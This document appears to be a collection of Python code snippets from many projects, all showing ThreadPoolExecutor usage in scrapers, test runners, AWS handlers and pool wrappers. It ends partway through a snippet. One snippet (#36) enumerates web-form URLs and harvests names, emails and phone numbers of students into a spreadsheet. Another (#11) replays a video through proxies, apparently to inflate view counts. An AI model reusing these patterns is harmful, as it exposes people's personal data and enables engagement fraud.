Example #1
def fetch_item_info(session, observations, claims, verbose=False):
    """
    Fetches information about wikidata items.

    :Parameters:
        session : :class:`mwapi.Session`
            An API session to use for querying
        observations : `iterable`(`dict`)
            A collection of observations to annotate
        claims : `list` ( `str` )
            A set of property names to look up claims for
        verbose : `bool`
            If True, print a progress dot to stderr for each item

    :Returns:
        An `iterator` of observations augmented with an `autolabel` field
        containing the requested information.  Note that observations that
        can't be found will be excluded.
    """
    batches = chunkify(observations, 25)

    executor = ThreadPoolExecutor(max_workers=4)
    _fetch_item_info = build_fetch_item_info(session, claims)

    for annotated_batch in executor.map(_fetch_item_info, batches):
        for annotated_item in annotated_batch:
            yield annotated_item
            if verbose:
                sys.stderr.write(".")
                sys.stderr.flush()

    if verbose:
        sys.stderr.write("\n")
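# A minimal, hypothetical usage sketch for fetch_item_info above. The endpoint,
# user agent, observation dicts, and claim property IDs are illustrative
# assumptions; chunkify and build_fetch_item_info are assumed to be defined in
# the surrounding module.
import mwapi

session = mwapi.Session("https://www.wikidata.org", user_agent="fetch_item_info example")
observations = [{"id": "Q42"}, {"id": "Q64"}]

for observation in fetch_item_info(session, observations, claims=["P31"], verbose=True):
    print(observation["autolabel"])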
Example #2
  def _connect_rover_fired(self):
    """Handle callback for HTTP rover connections.

    """
    if not self.device_uid:
      msg = "\nDevice ID not found!\n\nConnection requires a valid Piksi device ID."
      self._prompt_setting_error(msg)
      return
    if not self.http:
      self._prompt_networking_error("\nNetworking disabled!")
      return
    try:
      _base_pragma = self.base_pragma
      if not self.http.connect_write(self.link, self.whitelist, pragma=_base_pragma):
        msg = ("\nUnable to connect to Skylark!\n\n"
               "Please check that you have a network connection.")
        self._prompt_networking_error(msg)
        self.http.close()
        self.connected_rover = False
        return
      self.connected_rover = True
      print "Connected as a base station!"
      executor = ThreadPoolExecutor(max_workers=2)
      executor.submit(self._retry_read)
    except:
      self.connected_rover = False
      import traceback
      print traceback.format_exc()
Example #3
def search(rootTitle, destTitle, session, maxDepth=-1):
    ''' 
    Given the title of a Wikipedia page, find how many 'hops' it takes
    to get to the given destination page.

    Uses the breadth-first search algorithm.
    '''

    visited = set()

    consumerQueue = queue.Queue(MAX_CONSUMER_QUEUE_SIZE)
    consumerQueue.put(page.Page(rootTitle, session, 0))

    producerQueue = queue.Queue()

    executor = ThreadPoolExecutor(2)

    # Start thread to consume pages
    consumerArgs = [destTitle, consumerQueue, producerQueue, visited]
    consumerFuture = executor.submit(consumer, *consumerArgs)

    # Start thread to produce child pages and add them to consumer queue
    producerArgs = [consumerQueue, producerQueue, session]
    executor.submit(producer, *producerArgs)

    return consumerFuture.result()
Example #4
def main():
    # Update configuration from the local file
    from .configuration import Setting
    Setting.read_cfg_from_file()

    # Print instance information
    print("Node name: {0}\nNode address: {1}".format(Setting.get_node_name(), Setting.get_node_addr()))

    # Reset data in the database
    from .meta_storage import MetaStorage
    meta_storage = MetaStorage()
    meta_storage.drop_database()
    meta_storage.close_connection()
    print("Clear data in the database complete.")

    # Reset data in the local storage
    from general.services import Services
    if not Services.is_folder_exist(Setting.get_local_storage()):
        Services.t_print(Setting.get_local_storage() + " does not exist! (Local Storage).")

    # Get file from the folder
    import glob
    import os
    files = glob.glob(Setting.get_local_storage() + "*")
    for file in files:
        os.remove(file)
    print("Clear {0} files in the local storage complete.".format(len(files)))

    # Create a thread for running REST service
    from concurrent.futures import ThreadPoolExecutor
    pool = ThreadPoolExecutor()
    pool.submit(run_rest_service)
Example #5
def run_test_program(test_cases: List[TestCase],
                     program: str,
                     get_flags: Callable[[str], List[str]]) -> List[Result]:
    """
    Run the program and return a list of results.
    """
    def run(test_case):
        test_dir, test_name = os.path.split(test_case.file_path)
        flags = get_flags(test_dir)
        test_flags = get_test_flags(test_case.file_path)
        cmd = [program]
        if test_case.input is None:
            cmd.append(test_name)
        cmd += flags + test_flags
        if verbose:
            print('Executing', ' '.join(cmd))
        try:
            output = subprocess.check_output(
                cmd, stderr=subprocess.STDOUT, cwd=test_dir,
                universal_newlines=True, input=test_case.input)
        except subprocess.CalledProcessError as e:
            # we don't care about nonzero exit codes... for instance, type
            # errors cause hh_single_type_check to produce them
            output = e.output
        return check_result(test_case, output)

    executor = ThreadPoolExecutor(max_workers=max_workers)
    futures = [executor.submit(run, test_case) for test_case in test_cases]

    return [future.result() for future in futures]
Example #6
def txmake_all():

    executor = ThreadPoolExecutor(4)
    futures = []

    for node_type, attr in _texture_attrs:
        for node in cmds.ls(type=node_type) or ():
            src = cmds.getAttr(node + '.' + attr).strip()
            if not src:
                continue

            if src.endswith('.tex'):
                dst = src
                src = dst.rsplit('.', 1)[0]
            else:
                dst = src + '.tex'

            if not os.path.exists(src):
                print 'MISSING TEXTURE from %s.%s %s: %s' % (node_type, attr, node, src)
                continue

            if os.path.exists(dst) and os.path.getmtime(src) <= os.path.getmtime(dst):
                print 'Skipping up-to-date %s.%s %s: %s' % (node_type, attr, node, dst)
                future = None
            else:
                print 'Txmaking %s.%s %s: %s' % (node_type, attr, node, src)
                future = executor.submit(txmake, src, dst, newer=False)
            futures.append((future, node, attr, dst))

    for future, node, attr, dst in futures:
        if future:
            future.result() # Wait for it
        cmds.setAttr(node + '.' + attr, dst, type='string')
Example #7
def main(cmd, args):

    logging.basicConfig(
        level=logging.INFO,
        format=("%(relativeCreated)04d %(process)05d %(threadName)-10s "
                "%(levelname)-5s %(msg)s"))

    pool = Pool(max_workers=1)

    arg1 = tmp_fname
    arg2 = 'arg2'

    stage_file_name = cmd

    if (glob_stage == 1):

        f = pool.submit(check_output, ["ec-perl", "-w", stage_file_name, args, arg2], shell=True)
        print "stage 1 started. Initiate call to" + stage_file_name
        print "Stage is " + str(glob_stage)
    else:

        f = pool.submit(check_output, ["ec-perl", stage_file_name, " ", args, arg2], shell=True)
        print "stage 2 started. Initiate call to" + stage_file_name + " " + args + " " + arg2 + "'"
        print "Stage is " + str(glob_stage)

    f.add_done_callback(callback)
    pool.shutdown(wait=False)
Example #8
def main():
    db.fixkeys(key_utils.to_ipv6)
    parser = argparse.ArgumentParser(description='Submit nodes and links to fc00')
    parser.add_argument('-v', '--verbose', help='increase output verbosity',
                        dest='verbose', action='store_true')
    parser.set_defaults(verbose=False)
    args = parser.parse_args()

    con = connect()

    nodes = dump_node_store(con)
    edges = {}

    get_peer_queue = queue.Queue(0)
    result_queue = queue.Queue(0)
    e = ThreadPoolExecutor(max_workers=4)
    def args():
        for ip,node in nodes.items():
            yield ip,keyFromAddr(node['addr']),node['path'],node['version']
    args = zip(*args())
    dbnodes = {}
    for peers, node_id, ip in e.map(get_peers_derp, *args):
        get_edges_for_peers(edges, peers, node_id)
        addpeersto(dbnodes,node_id,ip,peers)

        for ip, id in peers:
            addpeersto(dbnodes,id,ip)
    print('otay!')
    send_graph(dbnodes, edges)
    sys.exit(0)
Example #9
 def _request(self, src_lang, tgt_lang, src_texts):        
     """
     Description:
         Receive src_texts, which should be a list of texts to be
         translated. The _request method calls _basic_request for each
         HTTP request and assembles the JSON dictionaries returned by
         _basic_request. When _basic_request must be called multiple
         times, the concurrent.futures package is used to run the calls
         concurrently in threads.
     Return Value:
         String object.
     """                
     executor = ThreadPoolExecutor(max_workers=len(src_texts))
     threads = []        
     for src_text in src_texts:                   
         future = executor.submit(
             self._basic_request,
             src_lang,
             tgt_lang,
             src_text,
         )            
         threads.append(future)
     
     # check whether all threads finished or not.
     # con_success = self._check_threads(threads)      
     #if not con_success:
     #    return "Please check your site"
     if threads[0].result() == None:
         return "Error in network!"
     
     merged_text = self._merge_text(
         [future.result() for future in threads],
     )   
         
     return merged_text
Example #10
def handler(event, context):
    logger.info("Start!")

    executor = ThreadPoolExecutor(max_workers=1000)
    main_loop = asyncio.new_event_loop()
    main_loop.set_default_executor(executor)
    asyncio.set_event_loop(main_loop)

    poll = Poll(main_loop)
    cal = poll.cal
    update_and_delete = UpdateAndDelete(main_loop, executor)

    table = event['table']
    queue_url = event['queueUrl']
    message_count = event['messageCount']

    poll.messages(sqs, queue_url, message_count)

    logger.info("Receive API count: {}".format(poll.fetch_count))
    logger.info("Fetched messages: {}".format(poll.message_count))

    update_and_delete.execute(sqs_client, db, queue_url, table, cal.stats)

    logger.info("Update API count: {}".format(update_and_delete.update_count))
    logger.info("Delete API count: {}".format(update_and_delete.delete_count))
    logger.info("Delete Message count: {}".format(
        update_and_delete.deleted_message_count))

    main_loop.close()
    executor.shutdown()

    return "Lambda job finished successfully."
Example #11
def play(av, n):
    proxy_list = get_proxy(n)
    executor = ThreadPoolExecutor(max_workers=n)
    play_video_av = partial(play_video_1, av=av)

    for data in executor.map(play_video_av, proxy_list):
        print("in main: 1 success".format(data))
Example #12
class ThreadPool:

    def __init__(self, workers=1):
        self._jobs = []
        self._pool = ThreadPoolExecutor(workers)

    def _finish(self, job):
        try:
            self._jobs.remove(job)
        except ValueError:
            pass
        try:
            e = job.exception()
            if e:
                raise e
        except Exception as e:
            error(str(e), exc_info=True)

    def schedule(self, func):
        job = self._pool.submit(func)
        job.add_done_callback(self._finish)
        self._jobs.append(job)

    def shutdown(self):
        for job in as_completed(self._jobs):
            job.result()
        self._pool.shutdown()
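# A minimal usage sketch for the ThreadPool wrapper above. It assumes the
# module-level error() logging helper and the as_completed import that the
# class itself relies on; job() is a hypothetical workload.
def job():
    return sum(range(1_000_000))

pool = ThreadPool(workers=4)
for _ in range(8):
    pool.schedule(job)   # exceptions raised by job() are logged by _finish()
pool.shutdown()          # waits for the remaining jobs before shutting the pool down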
Example #13
    def __init__(self):
        settings_manager = SettingsManager() # Set up the settings_manager

        max_workers = settings_manager.getint('application', 'max-workers') # Get the max workers from settings manager
        profiler_on = settings_manager.getint('debugging', 'profiler-on') # Get whether the profiler is enabled
        absolute = settings_manager.getint('save', 'absolute') # Get whether it's an absolute path
        save_path = settings_manager.get('save', 'path') # Get the save path
        if not absolute:
            save_path = PROJECT_PATH + os.path.sep + save_path

        executor = ThreadPoolExecutor(max_workers=max_workers, profiler_on=profiler_on) # Set up the thread executor
        dis = Disassembler(settings_manager) # Build the disassembler
        server = PyDAServer('0.0.0.0',9000) # Set up the PyDA server
        save_manager = SaveManager(save_path)

        if profiler_on:
            profile = Profile()
            profile.enable()

        app.build_and_run(settings_manager, dis, executor, server, save_manager) # Run the interface

        if profiler_on:
            profile.disable()
            stats = executor.getProfileStats()
            if stats == None:
                stats = Stats(profile)
            else:
                stats.add(profile)
            with open('profile.stats', 'wb') as statsfile:
                stats.stream = statsfile
                stats.sort_stats('cumulative').print_stats()
Example #14
File: verify.py Project: Orvid/hhvm
def run_test_program(files, program, expect_ext, get_flags):
    """
    Run the program and return a list of Failures.
    """
    def run(f):
        test_dir, test_name = os.path.split(f)
        flags = get_flags(test_dir)
        cmd = [program, test_name] + flags
        if verbose:
            print('Executing', ' '.join(cmd))
        try:
            output = subprocess.check_output(
                    cmd, stderr=subprocess.STDOUT, cwd=test_dir,
                    universal_newlines=True)
        except subprocess.CalledProcessError as e:
            # we don't care about nonzero exit codes... for instance, type
            # errors cause hh_single_type_check to produce them
            output = e.output
        return check_result(f, expect_ext, output)

    executor = ThreadPoolExecutor(max_workers=max_workers)
    futures = [executor.submit(run, f) for f in files]

    results = [f.result() for f in futures]
    return [r for r in results if r is not None]
Example #15
class ModulePool:

    def __init__(self, workers=1):
        self._jobs = {}
        self._pool = ThreadPoolExecutor(workers)

    def _launch(self, func, hook, dependencies):
        if dependencies:
            for dependency in dependencies:
                while True:
                    if dependency in self._jobs.keys():
                        self._jobs[dependency].result()
                        break
                    else:
                        sleep(0.1)
        func(hook)

    def schedule(self, func, hook):
        innerfunc, args, module, hookname, dependencies = hook
        job = self._pool.submit(self._launch, func, hook, dependencies)
        self._jobs[module] = job

    def shutdown(self):
        for job in as_completed([self._jobs[j] for j in self._jobs]):
            job.result()
        self._pool.shutdown()
Example #16
class AsyncClient(object):
    """Client which uses the base to be more performant.

    This client uses Futures with a ThreadPoolExecutor. This allows requests to
    be executed asynchronously. Asynchronous execution with multiple Clients
    enables requests to be processed in parallel and with pipeline execution at
    the server, which can drastically improve achievable interoperability rate
    as observed at the client.

    Note that methods return Future objects. Users should handle the response
    and errors appropriately. If serial request execution is desired, ensure the
    Future response or error is received prior to making another request.
    """

    def __init__(self, url, username, password, timeout=1):
        """Create a new AsyncClient and login.

        Args:
            url: Base URL of interoperability server
                (e.g., http://localhost:8000)
            username: Interoperability username
            password: Interoperability password
            timeout: Individual session request timeout (seconds)
        """
        self.client = Client(url, username, password, timeout)

        self.server_info_executor = ThreadPoolExecutor(max_workers=1)
        self.uas_telemetry_executor = ThreadPoolExecutor(max_workers=1)
        self.obstacles_executor = ThreadPoolExecutor(max_workers=1)

    def get_server_info(self):
        """GET server information, to be displayed to judges.

        Returns:
            Future object which contains the return value or error from the
            underlying Client.
        """
        return self.server_info_executor.submit(self.client.get_server_info)

    def post_telemetry(self, telem):
        """POST new telemetry.

        Args:
            telem: Telemetry object containing telemetry state.

        Returns:
            Future object which contains the return value or error from the
            underlying Client.
        """
        return self.uas_telemetry_executor.submit(self.client.post_telemetry,
                                                  telem)

    def get_obstacles(self):
        """GET obstacles.

        Returns:
            Future object which contains the return value or error from the
            underlying Client.
        """
        return self.obstacles_executor.submit(self.client.get_obstacles)
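# A minimal, hypothetical usage sketch for AsyncClient. The URL and credentials
# are illustrative assumptions; per the class docstring, every call returns a
# concurrent.futures.Future, so errors surface when result() is called.
client = AsyncClient("http://localhost:8000", "testuser", "testpass")

info_future = client.get_server_info()
obstacles_future = client.get_obstacles()

# For serial behaviour, wait on each Future before issuing the next request.
try:
    print(info_future.result(timeout=5))
    print(obstacles_future.result(timeout=5))
except Exception as exc:
    print("interop request failed:", exc)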
Example #17
def _getResults(runIDs, output_handler, benchmark):
    executor = ThreadPoolExecutor(MAX_SUBMISSION_THREADS)

    while len(runIDs) > 0 :
        start = time()
        runIDsFutures = {}
        failedRuns = []
        for runID in runIDs:
            state = _isFinished(runID)
            if state == "FINISHED" or state == "UNKOWN":
                run = runIDs[runID]
                future  = executor.submit(_getAndHandleResult, runID, run, output_handler, benchmark)
                runIDsFutures[future] = runID
            elif state == "ERROR":
                failedRuns.append(runID)

        # remove all finished runs from _unfinished_run_ids
        for future in as_completed(runIDsFutures.keys()):
            if future.result():
                del runIDs[runIDsFutures[future]]
                _unfinished_run_ids.remove(runIDsFutures[future])
        
        # remove failed runs from _unfinished_run_ids
        for runID in failedRuns:
            _unfinished_run_ids.remove(runID)
            del runIDs[runID]

        end = time()
        duration = end - start
        if duration < 5:
            sleep(5 - duration)
Example #18
 def test(no_workers, pipeline, input, state, run_function = run_pipeline):
      executor = ThreadPoolExecutor(max_workers = no_workers)
      try:
           result = run_function(executor, pipeline, input, state)
      finally:
           executor.shutdown(True)
      return result
Example #19
class HttpThreadpool(object):

    def __init__(self, max_workers=10, queue_size=200):
        self.executor = ThreadPoolExecutor(max_workers, queue_size)

    @retry(max_tries=3)
    def _download(self, url):
        req = urllib2.Request(url)
        req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36')
        rsp = urllib2.urlopen(req, timeout=30)
        return rsp.read()

    def download_and_process(self, url, body_process):
        return self.executor.submit(self._download_and_process, url, body_process)

    def _download_and_process(self, url, body_process):
        body_func, body_args, body_kw = body_process
        body = self._download(url)
        try:
            body_func(body, *body_args, **body_kw)
        except Exception as e:
            print url, traceback.format_exc()

    def shutdown(self):
        self.executor.shutdown()
Example #20
def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("shader",
                        nargs='*',
                        default=['shaders'],
                        metavar="<shader_file | shader dir>",
                        help="A shader file or directory containing shader "
                             "files. Defaults to 'shaders/'")
    args = parser.parse_args()

    os.environ["shader_precompile"] = "true"
    os.environ["allow_glsl_extension_directive_midshader"] = "true"
    if "INTEL_DEBUG" in os.environ:
        print("Warning: INTEL_DEBUG environment variable set!", file=sys.stderr)
        os.environ["INTEL_DEBUG"] += ",vs,gs,fs"
    else:
        os.environ["INTEL_DEBUG"] = "vs,gs,fs"

    try:
        os.stat("bin/glslparsertest")
    except OSError:
        print("./bin must be a symlink to a built piglit bin directory")
        sys.exit(1)

    runtimebefore = time.time()

    filenames = process_directories(args.shader)

    executor = ThreadPoolExecutor(cpu_count())
    for t in executor.map(run_test, filenames):
        sys.stdout.write(t)

    runtime = time.time() - runtimebefore
    print("shader-db run completed in {:.1f} secs".format(runtime))
Example #21
class ElasticDataSink:

    def __init__(self, name, conn, model_identifier, workers=5, bound=10000):
        self.name = name
        self.conn = conn
        self.model_identifier = model_identifier
        self.queue = Queue(maxsize=bound)
        self.pool = ThreadPoolExecutor(max_workers=workers)

    def start(self):
        self.model_identifier.model_class.init(using=self.conn)

    def __sink_item(self):
        try:
            item = self.queue.get_nowait()
            save_status = item.save(using=self.conn)
            if not save_status:
                logger.error("Error saving the item to the sink")
            else:
                logger.info("item saved to the sink")
        except Empty as e:
            logger.warn("sink queue is empty")
            logger.warn(e)

    def sink_item(self, item):
        assert isinstance(item, self.model_identifier.model_class), \
            " item must be an instance of " + str(self.model_identifier.model_class)

        try:
            self.queue.put(item, timeout=10)
            self.pool.submit(self.__sink_item)
        except Full as e:
            logger.error("sink queue is full")
            logger.error(e)
Example #22
    def time_sosfilt(self, n_samples, threads):
        pool = ThreadPoolExecutor(max_workers=threads)
        futures = []
        for i in range(threads):
            futures.append(pool.submit(sosfilt, self.filt, self.chunks[i]))

        wait(futures)
Example #23
    def start(self, s=0, ms=50, event_executor=None):
        """Start the main loop for the context in a create thread, and then return.

        :param int s: timeout value (seconds). Passed to :meth:`event_wait` in the main loop.
        :param int ms: timeout value (milliseconds). Passed to :meth:`event_wait` in the main loop.
        :param concurrent.futures.Executor event_executor: Event executor instance. Events will be fired in it.
            Default is a :class:`concurrent.futures.ThreadPoolExecutor` instance
        :return: New created event loop thread.
        :rtype: threading.Thread

        This method returns soon after the main loop thread started, so it **does not block**.

        Equivalent to setting :attr:`is_running` to `True`.
        """
        self.logger.info('<0x%x>start: >>> s=%s, ms=%s', id(self), s, ms)
        if self._is_running:
            raise RuntimeError("Context loop already started.")
        if event_executor:
            self._event_executor = event_executor
        else:
            try:
                self._event_executor = ThreadPoolExecutor()
            except TypeError:  # Changed in version 3.5: If max_workers is None or not given, it will default to the number of processors on the machine, multiplied by 5
                self._event_executor = ThreadPoolExecutor(cpu_count() * 5)
        self._event_loop_thread = threading.Thread(
            target=self._event_loop, args=(s, ms))
        self._start_cond.acquire()
        self._event_loop_thread.start()
        self._start_cond.wait()
        self._start_cond.release()
        self.logger.info('<0x%x>start: <<< -> %s',
                         id(self), self._event_loop_thread)
        return self._event_loop_thread
Example #24
def upload_file(upload_file_name,
                temp_file_name='encoded.csv',
                split_file_format="{orig_file}_{id}.{orig_ext}",
                parent_folder_id='0B46HJMu9Db4xTUxhQ0x4WHpfVmM'):
    file_name = os.path.basename(upload_file_name)

    # Encode file.
    base64.encode(open(upload_file_name), open(temp_file_name, 'w+'))

    # Split file.
    num_split_files, file_names = splitfile(temp_file_name, SPLIT_SIZE, split_file_format)

    # Start upload threads.
    start = time.time()
    file_id = uuid.uuid1()
    thread_pool = ThreadPoolExecutor(max_workers=MAX_DOWNLOADS)

    for i in range(num_split_files):
        current_file_name = file_names[i]
        up_t = upload_worker.UploadWorker(index=i + 1,
                                          file_id=file_id,
                                          filename=file_name,
                                          parent_folder_id=parent_folder_id,
                                          total_file_num=num_split_files,
                                          upload_file_name=current_file_name)
        future = thread_pool.submit(up_t.run)

    # Wait for completion.
    thread_pool.shutdown()

    end = time.time()
    m, s = divmod(end - start, 60)
    print "Overall time taken: ", m, "m ", s, "s"
    return file_id
Example #25
class LoaferRunner:
    def __init__(self, loop=None, max_workers=None, on_stop_callback=None):
        self._on_stop_callback = on_stop_callback
        self.loop = loop or asyncio.get_event_loop()

        # XXX: See https://github.com/python/asyncio/issues/258
        # The minimum value depends on the number of cores in the machine
        # See https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.ThreadPoolExecutor
        self._executor = ThreadPoolExecutor(max_workers)
        self.loop.set_default_executor(self._executor)

    def start(self, future=None, run_forever=True):
        start = 'starting Loafer, pid={}, run_forever={}'
        logger.info(start.format(os.getpid(), run_forever))

        self.loop.add_signal_handler(signal.SIGINT, self.stop)
        self.loop.add_signal_handler(signal.SIGTERM, self.stop)

        try:
            if run_forever:
                self.loop.run_forever()
            else:
                self.loop.run_until_complete(future)
                self.stop()
        except CancelledError:
            self.loop.close()

    def stop(self, *args, **kwargs):
        logger.info('stopping Loafer ...')
        if callable(self._on_stop_callback):
            self._on_stop_callback()

        self._executor.shutdown(wait=True)
        if self.loop.is_running():
            self.loop.stop()
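# LoaferRunner installs its ThreadPoolExecutor as the loop's default executor,
# so coroutines can offload blocking calls with run_in_executor(None, ...).
# A self-contained sketch of that pattern; blocking_io() is a hypothetical
# stand-in for real blocking work.
import asyncio
import time
from concurrent.futures import ThreadPoolExecutor


def blocking_io():
    time.sleep(0.1)   # stand-in for a blocking call (disk, HTTP, SQS, ...)
    return "done"


async def main():
    loop = asyncio.get_running_loop()
    # None selects the loop's default executor, i.e. the pool installed below.
    result = await loop.run_in_executor(None, blocking_io)
    print(result)


loop = asyncio.new_event_loop()
loop.set_default_executor(ThreadPoolExecutor(max_workers=4))
loop.run_until_complete(main())
loop.close()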
Example #26
    def start_client(self):
        if self.simulate_sensor is True:
            from stemlab_client.sensors.dht22_sensor_simulator import DHT22Sensor
        else:
            from stemlab_client.sensors.dht22_sensor import DHT22Sensor

        try:
            exit_monitor = GracefulExit()
            self._load_persistent_data()
            if self._device_settings is None:
                self._setup_device()
                shelve_db = shelve.open(self._db_filename, writeback=True)
                shelve_db[self.SETTINGS_KEY] = self._device_settings
                shelve_db.close()

            sensor = DHT22Sensor(self._device_settings.device_id,
                                 units=FAHRENHEIT)
            executor = ThreadPoolExecutor(4)
            next_reading = time.time()

            while True:
                readings = sensor.poll()
                for reading in readings:
                    template = self._device_settings.measurement_templates[reading.measurement_type.name]
                    post_data = generate_measurement_params(template, reading)
                    post_future = executor.submit(post, post_data['href'], post_data['params'])
                    post_future.add_done_callback(callback_reading_post)
                next_reading += self.poll_interval
                time.sleep(next_reading - time.time())
                if exit_monitor.exit_now is True:
                    break

        except Exception as e:
            print traceback.format_exc()
            print str(e)
Example #27
class RemoteHelloConsumer(object):
    def __init__(self):
        self._helloservice = None
        self._name = "Python"
        self._msg = "Hello Java"
        self._executor = ThreadPoolExecutor()

    @Validate
    def _validate(self, bundle_context):
        # call it!
        resp = self._helloservice.sayHello(self._name + "Sync", self._msg)
        print(
            "{0} IHello service consumer received sync response: {1}".format(
                self._name, resp
            )
        )
        # call sayHelloAsync which returns Future and we add lambda to print
        # the result when done
        self._executor.submit(
            self._helloservice.sayHelloAsync, self._name + "Async", self._msg
        ).add_done_callback(
            lambda f: print("async response: {0}".format(f.result()))
        )
        print("done with sayHelloAsync method")
        # call sayHelloAsync which returns Future and we add lambda to print
        # the result when done
        self._executor.submit(
            self._helloservice.sayHelloPromise,
            self._name + "Promise",
            self._msg,
        ).add_done_callback(
            lambda f: print("promise response: {0}".format(f.result()))
        )
        print("done with sayHelloPromise method")
Example #28
def handler(event, context):
    logger.info("Start!")

    executor = ThreadPoolExecutor(max_workers=100)

    cal = Sum()

    queue_url = event['queueUrl']
    message_count = event['messageCount']

    queue = sqs.Queue(queue_url)
    num_of_calls = message_count // batch_count

    queues = []
    for i in range(num_of_calls):
        queues.append(queue)

    message_count = 0

    responses = executor.map(one_request, queues)
    for response in responses:
        message_count += len(response)
        for msg in response:
            cal.add(msg)

    logger.info("Receive API count: {}".format(num_of_calls))
    logger.info("Fetched messages: {}".format(message_count))

    executor.shutdown()
Example #29
class BaseDataLayer(Layer):

    def setup(self, bottom, top):
        param = eval(self.param_str_)
        self.batch_size_ = param['batch_size']
        self.data_setup(bottom, top)
        top[0].reshape(*self.data_.shape)
        self.executor_ = ThreadPoolExecutor(max_workers=1)
        self.thread_ = self.executor_.submit(self.internal_thread_entry)

    def reshape(self, bottom, top):
        pass

    def forward(self, bottom, top):
        self.thread_.result()
        top[0].reshape(*self.data_.shape)
        top[0].data[...] = self.data_
        self.thread_ = self.executor_.submit(self.internal_thread_entry)

    def data_setup(self, bottom, top):
        raise NotImplementedError()

    def internal_thread_entry(self):
        raise NotImplementedError()

    def __del__(self):
        self.thread_.result()
        self.executor_.shutdown()
        super(self.__class__, self).__del__()
Example #30
class ScheduledIOPool(Thread):
    """Schedule events to an IO worker pool.
    """

    def __init__(self, workers, delay):
        super(ScheduledIOPool, self).__init__()
        self.scheduler = sched.scheduler(time.time, time.sleep)
        self.thread_pool = ThreadPoolExecutor(max_workers=workers)
        self.delay = delay
        self.shutdown = False
        self.daemon = True

    def shutdown(self):
        self.shutdown = True

    # TODO shutdown
    def run(self):
        while not self.shutdown:
            try:
                self.scheduler.run()
                time.sleep(.1)    # TODO: no wait/notify when queue is empty
            except:     # TODO log
                print "Unexpected error scheduling IO:"
                traceback.print_exc()
                time.sleep(.1)
        self.thread_pool.shutdown()

    def cancel(self, event):
        return self.scheduler.cancel(event)

    def schedule(self, *args):
        return self.scheduler.enter(self.delay, 1,
                                    self.thread_pool.submit, args)
Example #31
from flask import Flask, jsonify
from flask_adminlte import AdminLTE
from models import AdminUser, SimulationTask, ResultsPerDay, Base
from concurrent.futures import ThreadPoolExecutor
import sys
import json
from models import db_session, engine, Base
from tasks import run_long_task
from tasks import print_exception
from sqlalchemy import func
import logging
import logging.config
from config import g_logger

# Only one task at a time
executor = ThreadPoolExecutor(1)
task_future = None


#Main function contains multiple routes
def create_rido_application(configfile=None):
    app = Flask(__name__)
    AdminLTE(app)

    current_user = AdminUser()

    @app.teardown_appcontext
    def shutdown_session(exception=None):
        db_session.remove()

    @app.before_first_request
Example #32
from .text import Text
from .writers import PILWriter


def _to_inches(millimeters: float) -> float:
    return millimeters / 25.4


def _to_millimeters(inches: float) -> float:
    return inches * 25.4


logger = logging.getLogger(__name__)

loop = asyncio.get_event_loop()
thread_executor = ThreadPoolExecutor()


class EmptyPageException(Exception):
    pass


class Page:

    height_inches = FunctionBindDescriptor("height", _to_inches,
                                           _to_millimeters)
    width_inches = FunctionBindDescriptor("width", _to_inches, _to_millimeters)
    resolution = FunctionBindDescriptor("dpi", _to_inches, _to_millimeters)

    def __init__(self, height: int, width: int, dpi: int, columns=1) -> None:
        self.uuid = uuid4()
Example #33
#     res = pp.submit(get_page, i)
#     ret.append(res)
# pp.shutdown()
# for i in ret:
#     print(i.result())

"""map提交任务"""
from concurrent.futures import ThreadPoolExecutor


def get_page(i):
    time.sleep(0.5)
    return i


pp = ThreadPoolExecutor(5)
t = pp.map(get_page, range(100))
pp.shutdown()
for i in t:
    print(i, )

"""
Callback functions
"""

"""
9.6 Coroutines
"""
"""
The gevent module
"""
Example #34
        print('Key not found!')
        sys.exit()

sys.stdout.write('Downloading %d file(s) from %s\n' % (len(titles), album_url))
sys.stdout.flush()


# Downloads and writes to file using title
def download(url, title):
    filename = title + '.' + url.split('.')[-1]
    files = os.listdir(folder)  # List files in folder
    if filename in files:  # Skip file if already downloaded/downloading
        return

    # Download file from url
    r = requests.get(r'https://' + url[2 - len(url):], stream=True)
    with open(folder + filename, 'wb') as f:
        for chunk in r.iter_content(chunk_size=1024):
            if chunk:  # While alive
                f.write(chunk)
                f.flush()


# Download the videos concurrently, using simultaneous_workers threads
with ThreadPoolExecutor(max_workers=simultaneous_workers) as executor:
    for url, title in zip(videos, titles):
        print('Downloading ' + title + '...')
        executor.submit(download, url, title)

sys.stdout.write("\n%d Downloads Finished!" % (len(videos)))
Example #35
    email = tree.xpath('//*[@name="tfa_2"]')[0].items()[3][1]

    #Goes to XPATH location for phone on the form and stores the information
    phone = tree.xpath('//*[@name="tfa_94"]')[0].items()[3][1]

    #If a name was found then it appends all the data it found to the master list
    if name:
        master_list.append([id, name, email, phone])
        print(f"Name: {name}")
        print(f"Email: {email}")
        print(f"Phone: {phone}")


#Creates multiple threads so python can make multiple requests to the webpage
processes = []
with ThreadPoolExecutor(max_workers=100) as executor:
    for url in url_list:
        processes.append(executor.submit(enumerate_form, url))

#Counter for iterating through excel cells
counter = 1

#Iterates through all the students in the master list and writes them to excel
for student in master_list:
    counter += 1
    sheet['A' + str(counter)].value = student[0]
    sheet['B' + str(counter)].value = student[1]
    sheet['C' + str(counter)].value = student[2]
    sheet['D' + str(counter)].value = student[3]

#Saves excel workbook
Example #36
from threading import Thread

import time


def task(question, paragraph):
    s = Summarizer(paragraph, maxSumarySize=3)
    result = s.get_result()
    print(question, result)
    list1.append([question, result])


if __name__ == '__main__':
    start = time.time()
    list1 = []
    pool = ThreadPoolExecutor(20)
    for item in collection.find({"category": {"$gt": 0}}):
        ######## Using a single thread (serial) ##########
        # summar = Summarizer(paragraph, maxSumarySize=2)
        # result = summar.get_result()
        # print(result)
        # ######## Starting multiple threads ###########
        #     t=Thread(target=task,args=(item.get("question"),u"{}".format(item.get("answer"))))
        #     t.start()
        # for i in range(759):
        #     t.join()
        # print(list1)
        # stop = time.time()
        # print(stop-start)
        ######## Using a thread pool to start threads ########
        pool.submit(task, item.get("question"),
                    u"{}".format(item.get("answer")))
Example #37
 def executor(self):
     """single global executor"""
     cls = self.__class__
     if cls._executor is None:
         cls._executor = ThreadPoolExecutor(1)
     return cls._executor
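# A self-contained sketch of the lazily created, class-level executor pattern
# used above; the Worker class and its _executor attribute are hypothetical
# names standing in for the snippet's surrounding class.
from concurrent.futures import ThreadPoolExecutor


class Worker:
    _executor = None

    @property
    def executor(self):
        """single global executor"""
        cls = self.__class__
        if cls._executor is None:
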